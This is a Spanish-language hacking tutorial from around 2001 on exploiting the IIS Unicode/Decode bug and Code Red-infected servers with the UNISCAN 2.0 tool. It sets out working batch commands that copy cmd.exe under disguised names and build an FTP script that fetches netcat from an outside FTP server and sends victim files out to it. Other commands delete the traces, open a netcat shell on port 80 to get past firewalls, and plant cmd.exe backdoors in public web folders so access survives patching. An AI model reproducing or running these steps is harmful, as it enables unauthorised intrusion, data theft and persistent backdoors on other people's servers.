BUG Unicode/Decode & Virus Redcode
En un principio pensé en poner el
Manual de HeinekenTeam pero he decidido poner el QuickBasic, ya que hay una
manera para subir archivos a servidores vulnerables que no explican en ese manual.
Explicación:
Este es quizás el bug más grave que ha tenido el IIS de Microsoft,
ya que afectaba a más de un 50% de webs de internet, que permitía
hacer comandos dos desde el navegador haciendo que chavales de 15 años
tuvieran todo el control sobre el servidor.
En cuanto al Virus Redcode, ha sido uno de los peores y que ha
llegado a infectar a miles de servidores abriéndoles el puerto 80 y dando
acceso a quien quisiera entrar.
¿Cómo explotarlo?
en este manual nos vamos a centrar en como explotar Unicode/Decode y Redcode
desde el exploit elaborado por QuickBasic. Con este exploit que funciona sobre
windows9x, podremos hacer de todo en el servidor, hasta subir archivos.
EXPLICACIÓN DEL UNISCAN 2.0 (REVISIÓN 11/AGOSTO/2001) EL TERROR DE LOS IIS3/4/5 !!
EL UNISCAN 2.0 es un escáner y consola para las vulnerabilidades UNICODE/DECODE y también afectados con el WORM CODE-RED,que tienen los servidores de web de MICROSOFT (iis3/iis4/iis5) o sea WINNT Y WIN2000,estos bugs están por millones en el todo mundo...
Parte ESCÁNER: puedes darle una ip y el comprobara las 15 formas mas comunes de estas fallas, (90% de posibilidad de que salga aquí ya) .A partir de la versión 2.0 el UNISCAN también. detecta los servers que son accesibles gracias al nuevo WORM CODE-RED !!.Los 2 primeros GETS son .Los que comprueban esta posibilidad.
Si pulsas una tecla después de que acabe de escanear las 15 ,SEGUIRÁ PROBANDO 70 formas mas posibles,agotando todas las posibilidades.Estas están en el fichero "GETS.TXT" Y puedes añadir mas GETS tu mismo,simplemente pegándolas al final!!!
Cuando detecta que es vulnerable,esa ip pasa a la base de datos del uniscan,y podrás entrar después simplemente picando encima.
EL PESCADOR DE CODE-REDS: Esta opción deja al UNISCAN escuchando en nuestro puerto 80 para detectar las conexiones que nos harán .Los servidores con el CODE-RED,cuando intentan propagarlo. Es Seguro que el server es accesible para nosotros o sea que al detectar la conexión lo escaneara y si al ser posible el acceso,LO AÑADIRÁ A NUESTRA LISTA!!
PARTE CONSOLA: El uniscan abre automáticamente una consola para navegar y manipular .Los discos duros de la víctima SIN TENER QUE ESCRIBIR UN SOLO COMANDO! (que por otra parte serian muy tediosos de escribir a mano,pues para que funcionen se requiere poner las rutas completas)
NUEVA FUNCIÓN=LOTES DE COMANDOS!(ahora en lugar de copiar el cmd.exe como root.exe en /scripts lo copia como "LMHOST.EXE" en c:\ lo que permite que escribir texto en ficheros o subir y bajar por FTP se pueda hacer en casi todos!!)***NUEVA FUNCIÓN!! PUEDES HACER LOTES DE COMANDOS TU MISMO!!!!!VAN TRES INCLUIDOS EN EL FICHERO lotes.ini! PARA HACER MAS LOTES,ESCRIBE EL NOMBRE CON "#" ANTES Y PARA ACABAR EL LOTE,DEJA UNA LINEA EN BLANCO AL MENOS ENTRE EL SIGUIENTE!!!!! PARA EJECUTARLO= PULSA "L" y ESCRIBE EL NOMBRE sin "#" !!!PUEDES SUBIR FILES POR FTP,LEE EL LOTE DE EJEMPLO!!! EL FTP QUE INCLUYE ES DE ATERRA.***EL LOTE "#SHELL" lo que hace es abrir en el puerto 99 un shell con el netcat,para eso primero hay que subirlo! puedes cambiar el puerto tu mismo editando el LOTES.INI*****
(al pulsar la tecla cursor izquierda se pueden introducir comandos escritos,INTRO sin escribir nada nos devuelve a la interface)
Para EXPLORAR el disco duro,pinchando en los directorios,y para manipular ficheros,pinchando encima se abrira un menu de opciones con:
TYPE para presentar un file de texto ascii en pantalla
RENAME renombrar (SI SE PULSA ENTER SIN PONER NADA VUELVE)
COPY copiar a. (SI SE PULSA ENTER SIN PONER NADA VUELVE)
DEL borra un fichero (PIDE CONFIRMACION S/N)
BUSCAR (nueva funcion) BUSCA EN TODA la unidad de disco actual un fichero dado o todos los de una extension si pones *.log p.ejm o *.bat. Se escribira una lista de ficheros con sus rutas,Recuerda que si quieres salvarla se almacena en "uni.txt"
EJECUTAR ejecuta los .exe y tambien los .bat
WRITE (nueva funcion) Esto crea un fichero de texto llamado "aqui_estuvo_Pablo_.htm" donde puedes escribir repetidas veces,122 caracteres cada vez,se iran añadiendo al final de este fichero cada vez que lo uses.Despues lo renombras si quieres claro jeje.SI NO hay acceso TFTP es la unica forma de introducir algo en el server(PARA escribir un html por ejm,sustituye los "<" y ">" por sus equivalentes en UNICODE.
PORTAPAPELES esta util funcion memoriza el fichero,podemos seguir navegando y PEGARLO donde queramos y cuantas veces queramos en ese server SIMPLEMENTE PULSANDO "P" .
(Programado por _Pablo_ codigo fuente
a disposicion de quien lo pida)
Explicación del archivo Lotes.ini
Me han mandado muchos mails preguntandome cosas sobre como se sube por ftp etc etc .EL UNISCAN lo hace automaticamente!!! para eso esta la funcion LOTES si pulsas la tecla L y pones el nombre del LOTE se ejecutaran los comandos seguidos como si fuera un pequeño script. Tambien puedes configurar nuevos lotes y llamarle como quieras,solo hay que poner el nombre con # delante y al final dejar una linea en blanco!!
El fichero "lotes.ini" que va con el uniscan tiene 3 de ejemplo nada mas,aqui va la explicacion de como funcionan:
#SUBE_FILE
copy c:\winnt\system32\cmd.exe C:\lmhost.exe <----se hace una copia del shell
a c:\
echo quickbasic2 > c:\t.txt <----se escribe en el file t.txt el LOGIN
del ftp
echo 123456 >> c:\t.txt <----se escribe en el file t.txt el PASS del
ftp
echo binary >> c:\t.txt <----se escribe en el file t.txt BINARY para
poder subir exes y ascii
echo lcd c:\ >> c:\t.txt <--se escribe en el file t.txt LCD C:\ para
que el destino sea C:\
echo get nc.exe >> c:\t.txt <----se escribe en el file t.txt GET nc.exe
(file a subirse)
echo bye >> c:\t.txt<----se escribe en el file t.txt BYE para cerrar
la transmision ftp
ftp -s:c:\t.txt ftp.terra.es<----y aqui al fin se llama al comando FTP con
lo que hay en t.txt
del c:\t.txt <----una vez acabada la SUBIDA al server,se BORRA el t.txt (pa
que no cante)
dir c:\<----por ultimo se REFRESCA el directorio para que veamos el file
subido ahi.
#BAJA_FILE
copy c:\winnt\system32\cmd.exe C:\lmhost.exe<----igual que el anterior
echo quickbasic2 > c:\t.txt<----igual que el anterior
echo 123456 >> c:\t.txt<----igual que el anterior
echo binary >> c:\t.txt<----igual que el anterior
echo lcd c:\ >> c:\t.txt<----igual que el anterior
echo put c:\file.exe >> c:\t.txt<--aqui se BAJA a nuestro FTP el fichero
que en c:\file.exe
echo bye >> c:\t.txt<----igual que el anterior
ftp -s:c:\t.txt ftp.terra.es<----igual que el anterior
del c:\t.txt<----igual que el anterior
dir c:\<----igual que el anterior
#SHELL
C:\nc -l -p 80 -t -e C:\lmhost.exe <----este comando SACA UN SHELL USANDO
EL NETCAT por el puerto que nos de la gana,usa puertos que esten abiertos ya
como el 80,21,110,25 etc etc para saltarte los FIREWALL!! es muy facil,primero
subes el NETCAT con el lote SUBE_FILE y despues pones SHELL y con el telnet
te conectas al puerto,te saldra el cursor de msdos y podras teclear comandos
como si fuera tuyo.
#PUERTA_TRASERA
copy c:\winnt\system32\cmd.exe C:\inetpub\scripts\lmhost.exe
copy c:\winnt\system32\cmd.exe C:\inetpub\wwwroot\cgi-bin\lmhost.exe
copy c:\winnt\system32\cmd.exe D:\inetpub\scripts\lmhost.exe
copy c:\winnt\system32\cmd.exe D:\inetpub\wwwroot\cgi-bin\lmhost.exe
dir c:\
Este ultimo lote copia a directorios publicos
el cmd.exe poniendole lmhost.exe u el nombre que queramos para dejar una puerta
trasera en el caso que parcheen el servidor.SIEMPRE NOS QUEDARA un shell ahi
donde podremos seguir entrando!!
...:::DONWLOAD LOTES.INI EXTENDIDO:::...
By QUICKBASIC http://www.cie
